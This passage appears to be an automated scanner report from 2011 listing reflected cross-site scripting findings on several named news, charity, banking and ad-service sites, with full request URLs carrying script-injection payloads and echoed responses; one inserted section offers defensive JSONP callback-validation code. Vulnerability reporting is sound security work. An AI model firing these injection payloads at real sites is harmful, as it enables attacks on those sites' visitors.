Last-Modified: Thu, 03 Feb 2011 18:54:25 GMT
Connection: keep-alive
Content-Length: 119
The value of the js request parameter is copied into a JavaScript inline comment. The payload c4d58*/alert(1)//cadae76dd14 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:26 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n3), ms iad-agg-n3 ( sfo-agg-n36), ms sfo-agg-n36 ( origin)
ETag: "921c1eecd508a1cdcf54fe736b0295a6-275310"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:26 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:26 GMT
Connection: keep-alive
Content-Length: 275310
/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister */ /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License
...[SNIP]...
1.105. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://common.onset.freedom.com
Path: /tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c442d<script>alert(1)</script>e464d1587a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c442d<script>alert(1)</script>e464d1587a7=1 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:51 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n28), ms iad-agg-n28 ( sfo-agg-n44), ms sfo-agg-n44 ( origin)
ETag: "9619eb07dd52d1bb379fc8198f8514d7-86888"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:52 GMT
Age: 3
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:55 GMT
Connection: keep-alive
Content-Length: 86888
/* Reset styles for browser compatibility */ body, th, td, p, div { font-family:Arial, Helvetica, sans-serif; } html,ul,ol,li,h1,h2,h3,h4,h5,h6, pre ...[SNIP]...
1.106. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://common.onset.freedom.com
Path: /tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload e7e46*/alert(1)//5ca6254cbb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:45 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n25), ms iad-agg-n25 ( sfo-agg-n22), ms sfo-agg-n22 ( origin>CONN)
ETag: "36d7fe9bef85681434af3bae951e1aa9-277034"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:46 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:45 GMT
Connection: keep-alive
Content-Length: 277034
/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1 */ /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License * * Date: 200 ...[SNIP]...
The value of the scode request parameter is copied into the HTML document as plain text between tags. The payload 3df07<script>alert(1)</script>35144f36647 was submitted in the scode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister3df07<script>alert(1)</script>35144f36647 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:37 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n3), ms iad-agg-n3 ( sfo-agg-n14), ms sfo-agg-n14 ( origin)
ETag: "2ca22c76c464a94c8b23b21959b5333c-22441"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:37 GMT
Age: 0
Content-Type: text/css
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:37 GMT
Connection: keep-alive
Content-Length: 22441
/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister3df07<script>alert(1)</script>35144f36647 */ /*generic freedom site styles, take layout.css styles and define fonts, background images, etc */
/* define page areas */ body { font-family: Arial, Helvetica, sans-serif; font-size: 100%; ...[SNIP]...
The value of the scode request parameter is copied into a JavaScript inline comment. The payload 4af35*/alert(1)//4781d05c682 was submitted in the scode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister4af35*/alert(1)//4781d05c682 HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:54:31 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n36 ( iad-agg-n18), ms iad-agg-n18 ( sfo-agg-n52), ms sfo-agg-n52 ( origin)
ETag: "c2f050b674a3c750a989f83312ba3a06-4132"
Cache-Control: max-age=86400
Expires: Fri, 04 Feb 2011 18:54:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Last-Modified: Thu, 03 Feb 2011 18:54:31 GMT
Connection: keep-alive
Content-Length: 4132
/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister4af35*/alert(1)//4781d05c682 */ /* * jQuery ifixpng plugin * (previously known as pngfix) * Version 2.1 (23/04/2008) * @requires jQuery v1.1.3 or above * * Examples at: http://jquery.khurshid.com * Copyright (c) 20 ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fc1bd<script>alert(1)</script>f099d0b47bf was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completedfc1bd<script>alert(1)</script>f099d0b47bf HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27
1.110. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://da.newstogram.com
Path: /hg.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1a69a<script>alert(1)</script>840e96d1dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.compl/1a69a<script>alert(1)</script>840e96d1dd4eted HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b337"><script>alert(1)</script>ef6b6cded06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/TR/DaffodilDays6b337"><script>alert(1)</script>ef6b6cded06/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b20"><script>alert(1)</script>f315c83fe6a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/TR/DaffodilDays/DDFY10Pennsylvania20b20"><script>alert(1)</script>f315c83fe6a?pg=entry&fr_id=26972 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<title>The American Cancer Society: </title>
<meta http-equiv="Co
...[SNIP]...
<form name="TrEventSearchForm" id="TrEventSearchForm" action="http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania20b20"><script>alert(1)</script>f315c83fe6a?pg=entry&fr_id=26972" method="post">
...[SNIP]...
1.113. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://daffodil.acsevents.org
Path: /site/TR/DaffodilDays/DDFY10Pennsylvania
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ab"><script>alert(1)</script>a53cb358e62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972&ab6ab"><script>alert(1)</script>a53cb358e62=1 HTTP/1.1
Host: daffodil.acsevents.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 59e02<script>alert(1)</script>41e145e4da2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/mapserver.superpages.com/p.json?callback=_ate.ad.hpr59e02<script>alert(1)</script>41e145e4da2&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fmapserver.superpages.com%2Fmapbasedsearch%2F%3F%26SRC%3Dcomlocal1a%26C%3Dbanks415ee%2522%253balert(1)%2F%2F7f39f412a8d%26L%3D19101%26CS%3DL%26MCBP%3Dtrue%26C%3DBanks%26STYPE%3DS%26PS%3D15%26search%3DFind%2BIt&ref=http%3A%2F%2Fburp%2Fshow%2F52&wzilxl HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 463
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 03 Feb 2011 18:54:36 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 05 Mar 2011 18:54:36 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296759276.60|1296659685.66; Domain=.addthis.com; Expires=Sat, 02-Feb-2013 14:10:54 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 03 Feb 2011 18:54:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 18:54:37 GMT
Connection: close
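The two callback findings above (da.newstogram.com/hg.php and ds.addthis.com/p.json) reflect the callback parameter verbatim into the response body. The following is an added example, not code from either site, showing the standard fix: accept the callback name only if it is a dotted JavaScript identifier, fall back to a fixed name otherwise, and serve the result as application/javascript with X-Content-Type-Options: nosniff. The payload dictionary and the default callback name are assumptions. One caveat when triaging: the addthis response is labelled text/javascript, so a browser that navigates to that URL directly will not parse it as HTML; whether the reflection is exploitable as XSS on its own depends on the client's content sniffing, but callback injection into a script response needs the same fix either way.

```python
"""JSONP callback whitelisting (added example, not newstogram.com or addthis.com code)."""
import json
import re

# Constructed whitelist: ASCII identifier characters only, dotted member access allowed,
# which still admits the legitimate names seen in the report ("Newstogram.completed",
# "_ate.ad.hpr") while rejecting anything containing <, >, /, quotes or parentheses.
_IDENT = r"[A-Za-z_$][A-Za-z0-9_$]*"
_CALLBACK_RE = re.compile(rf"^{_IDENT}(?:\.{_IDENT})*$")
_MAX_CALLBACK_LEN = 64
_DEFAULT_CALLBACK = "callback"  # assumed default used when the supplied name is rejected


def is_valid_callback(name: str) -> bool:
    """True only for a dotted JavaScript identifier of bounded length."""
    return len(name) <= _MAX_CALLBACK_LEN and _CALLBACK_RE.fullmatch(name) is not None


def encode_json_for_script(payload) -> str:
    """Serialise payload so that it is safe inside a script body.

    ensure_ascii=True escapes U+2028/U+2029 (line terminators in JavaScript but not
    in JSON); < > & are escaped so a string value can never contain </script>.
    """
    text = json.dumps(payload, ensure_ascii=True)
    return text.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def jsonp_response(callback, payload) -> tuple:
    """Build (headers, body) for a JSONP endpoint.

    The raw callback string never reaches the body: it is either an exact match of
    the whitelist or replaced by _DEFAULT_CALLBACK. The leading "/**/" comment keeps
    the response from starting with attacker-chosen bytes, and nosniff stops the
    browser from treating a script response as HTML.
    """
    if callback is None or not is_valid_callback(callback):
        callback = _DEFAULT_CALLBACK
    body = f"/**/{callback}({encode_json_for_script(payload)});"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Cache-Control": "no-store",
    }
    return headers, body


if __name__ == "__main__":
    # Constructed inputs copied from the callback values in the requests above.
    for cb in ("Newstogram.completed", "_ate.ad.hpr",
               "_ate.ad.hpr59e02<script>alert(1)</script>41e145e4da2",
               "Newstogram.compl/1a69a<script>alert(1)</script>840e96d1dd4eted"):
        print(is_valid_callback(cb), jsonp_response(cb, {"ok": True})[1])
```

Rejecting rather than encoding is deliberate: a callback name is code, not data, so there is no encoding that makes an arbitrary string safe in that position. Returning 400 instead of falling back to a default is an equally valid choice.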
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6ebd"><script>alert(1)</script>7daaa4423aa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=f6ebd"><script>alert(1)</script>7daaa4423aa HTTP/1.1
Host: easycheckingbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.116. http://easycheckingbanking.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://easycheckingbanking.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2176b"><script>alert(1)</script>81ec6443090 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking?adid=640302&2176b"><script>alert(1)</script>81ec6443090=1 HTTP/1.1
Host: easycheckingbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d90"><script>alert(1)</script>0368ae71355 was submitted in the REST URL parameter 5. This input was echoed as f5d90\"><script>alert(1)</script>0368ae71355 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/o-c-in-top-three-for-job-growth/48434f5d90"><script>alert(1)</script>0368ae71355/ HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:05:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:05:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Handling Hard Times - www.ocregister.com" href="http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434f5d90\"><script>alert(1)</script>0368ae71355/feed/" />
...[SNIP]...
1.118. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44f2c"><script>alert(1)</script>737289185c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44f2c\"><script>alert(1)</script>737289185c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/o-c-in-top-three-for-job-growth/48434/?44f2c"><script>alert(1)</script>737289185c2=1 HTTP/1.1
Host: economy.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:05:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://economy.ocregister.com/xmlrpc.php
Link: <http://economy.ocregister.com/?p=48434>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
" type="application/rss+xml" title=" O.C. in top three for job growth - Handling Hard Times - www.ocregister.com" href="http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/?44f2c\"><script>alert(1)</script>737289185c2=1feed/" />
...[SNIP]...
1.119. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.cbs6albany.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aef0"><script>alert(1)</script>a10a5ec7939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2aef0"><script>alert(1)</script>a10a5ec7939=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?2aef0"><script>alert(1)</script>a10a5ec7939=1" />
...[SNIP]...
1.120. http://events.ocregister.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.ocregister.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9e5a"><script>alert(1)</script>8d769312283 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f9e5a"><script>alert(1)</script>8d769312283=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 89933<script>alert(1)</script>7b37a8f386f was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.122. http://events.ocregister.com/movies [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://events.ocregister.com
Path: /movies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f3e"><script>alert(1)</script>ceef51fea12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /movies?94f3e"><script>alert(1)</script>ceef51fea12=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
